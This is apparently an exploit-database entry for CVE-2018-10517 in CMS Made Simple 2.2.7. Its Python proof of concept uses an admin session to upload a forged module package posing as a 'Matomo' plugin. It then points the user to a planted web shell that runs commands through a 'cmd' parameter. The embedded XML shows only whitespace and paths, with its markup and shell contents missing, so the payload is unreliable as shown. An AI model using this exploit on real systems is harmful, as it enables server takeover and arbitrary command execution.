# Exploit Title: CMS Made Simple 2.2.7 - Remote Code Execution # Date: 04-11-2018 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ # Version: 2.2.7 # Tested on: Ubuntu 18.04 # CVE: CVE-2018-10517 # 1. Description: # CMS Made Simple is an Open Source Content Management System. Itas built using PHP and the Smarty Engine, which keeps content, functionality, and templates separated. # An attacker or a malicious user with access to the administration interface can execute code on the server. # 2. Proof of Concept: import requests # target configuration (required admin credentials in order to obtain a valid session) target_url="" session_cookie = "" session_value = "" # upload of shell unde the name of Matomo plugin burp0_url = target_url + "/admin/moduleinterface.php" burp0_cookies = {session_cookie: session_value} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://gk1v1ml3nfrd1bs00o69fmwnh.public2.attackdefenselabs.com/", "Content-Type": "multipart/form-data; boundary=---------------------------207726338310671742711263591267", "Connection": "close", "Upgrade-Insecure-Requests": "1"} burp0_data="-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"mact\"\r\n\r\nModuleManager,m1_,local_import,0\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"__c\"\r\n\r\n9a63802b6c4579cc01c\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"m1_upload\"; filename=\"test.xml\"\r\nContent-Type: text/xml\r\n\r\n\n 1.3\n Matomo\n 0.0.1\n 2.1.5\n \n \n \n \n /\n 1\n \n \n /action.admin_settings.php\n 0\n \n \n \n /action.admin_statistics.php\n 0\n \n \n \n /action.default.php\n 0\n \n \n \n /action.savesettings.php\n 0\n \n \n \n /lang/\n 1\n \n \n /lang/en_US.php\n 0\n \n \n \n /Matomo.module.php\n 0\n \n \n \n /moduleinfo.ini\n 0\n \n \n \n /templates/\n 1\n \n \n /templates/adminsettings.tpl\n 0\n \n \n\r\n-----------------------------207726338310671742711263591267--\r\n" requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print "Try to access your web shell at: " + target_url + "/modules/Matomo/action.admin_settings.php?cmd=ls%20-al" # 3. Solution: # There is no public available solution.